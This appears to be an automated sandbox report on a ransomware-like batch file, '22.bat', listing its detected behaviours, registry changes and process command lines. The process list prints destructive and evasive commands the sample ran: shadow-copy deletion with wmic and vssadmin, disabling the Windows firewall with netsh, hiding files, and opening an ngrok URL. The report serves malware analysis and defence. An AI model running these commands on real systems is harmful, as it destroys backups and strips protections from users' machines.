Malware Analysis Report

2025-03-15 00:56

Sample ID 240626-j8cbzaxfnq
Target 22.bat
SHA256 8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8
Tags
defense_evasion evasion execution impact persistence privilege_escalation ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

8254c19785e9b98091dc3644126e1b41188cba52549b2cdd5a84c4d4beb8c4f8

Threat Level: Likely malicious

The file 22.bat was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion evasion execution impact persistence privilege_escalation ransomware

Deletes shadow copies

Modifies Windows Firewall

Sets file to hidden

Checks computer location settings

Enumerates connected drives

Sets desktop wallpaper using registry

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Gathers network information

Interacts with shadow copies

Modifies Control Panel

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 08:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 08:19

Reported

2024-06-26 08:22

Platform

win10v2004-20240508-en

Max time kernel

131s

Max time network

152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000a858ce6d10004c6f63616c003c0009000400efbea8582761da5883422e00000096e10100000001000000000000000000000000000000e58d7f004c006f00630061006c00000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000a85827611100557365727300640009000400efbe874f7748da5883422e000000c70500000000010000000000000000003a0000000000eff5be0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000a858276112004170704461746100400009000400efbea8582761da5883422e00000083e10100000001000000000000000000000000000000db45ae004100700070004400610074006100000016000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000da588342100054656d7000003a0009000400efbea8582761da5883422e00000097e1010000000100000000000000000000000000000041905a00540065006d007000000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000a858a66d100041646d696e003c0009000400efbea8582761da5883422e00000078e10100000001000000000000000000000000000000700c0d00410064006d0069006e00000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3608 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3608 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3608 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 3608 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 3608 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 3608 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 3608 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3608 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3608 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3608 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3608 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3608 wrote to memory of 3756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3608 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3608 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3608 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3608 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3608 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 3744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 2284 wrote to memory of 3848 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 2284 wrote to memory of 3848 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 864 wrote to memory of 1684 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 864 wrote to memory of 1684 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3280 wrote to memory of 1668 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3280 wrote to memory of 1668 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 4160 wrote to memory of 1656 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 4160 wrote to memory of 1656 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3552 wrote to memory of 5132 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3552 wrote to memory of 5132 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 3608 wrote to memory of 5232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 5232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3608 wrote to memory of 5692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 5692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3608 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 3608 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

C:\Windows\system32\attrib.exe

attrib Admin-information.log +h

C:\Windows\explorer.exe

explorer .

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all/quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://ca82-152-231-188-225.ngrok-free.app/Kit

C:\Windows\system32\mode.com

mode con: cols=170 lines=45

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4368,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4784,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5284,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5436,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5444,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8

C:\Windows\system32\certutil.exe

certutil -decode "Image.bin" "Wallpaper.jpeg"

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5980,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:1

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 5

